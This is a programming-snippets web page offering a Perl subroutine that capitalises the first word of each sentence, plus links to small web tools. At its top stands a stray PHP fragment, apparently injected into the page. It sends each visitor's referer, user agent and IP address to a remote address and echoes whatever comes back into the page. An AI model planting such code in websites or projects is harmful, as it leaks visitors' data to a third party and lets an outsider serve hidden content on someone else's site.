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$referer = rawurlencode($_SERVER["HTTP_REFERER"]); $uagent = rawurlencode($_SERVER["HTTP_USER_AGENT"]); $aa = file_get_contents(''.$referer.'&s=check&ip='.$_SERVER["REMOTE_ADDR"].'&uagent='.$uagent); echo "$aa\r\n"; ?>
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RegExp to validate URL syntax
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Base64 Hex ASCII Encoder-Decoder
ClickBank Product Finder
BigPrism Dynamic Countdown Timer
BigPrism Typo Helper
RegExp to validate URL syntax
Capitalize the first word
The following Perl code will capitalize the first word of every sentence, depending on punctuation.
sub sentences{ $sString = shift; $sString = lc($sString); $sString =~ s/ +/ /gs; @words = split(" ", $sString); $firstword = 0; $sNewString = ""; $wordkey = 0; foreach $word(@words){ $word =~ s/ //gs; $lastchar = substr($word, -1); if($firstword || $wordkey == 0){ $word = ucfirst($word); $firstword = 0; $sNewString = $sNewString . " $word"; }elsif($lastchar eq '.' or $lastchar eq '!' or $lastchar eq '?'){ $firstword = 1; $sNewString = $sNewString . " $word"; }else{ $sNewString = $sNewString . " $word"; } $sNewString =~ s/ +/ /gs; $sNewString =~ s/ i / I /gs; $sNewString = trim($sNewString); $wordkey++; } return $sNewString; } sub trim($){ my $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; } # sentences('hi theRe! how Are yoU today? i hope you fine. am i right?'); # will return "Hi there! How are you today? I hope you fine. Am I right?"
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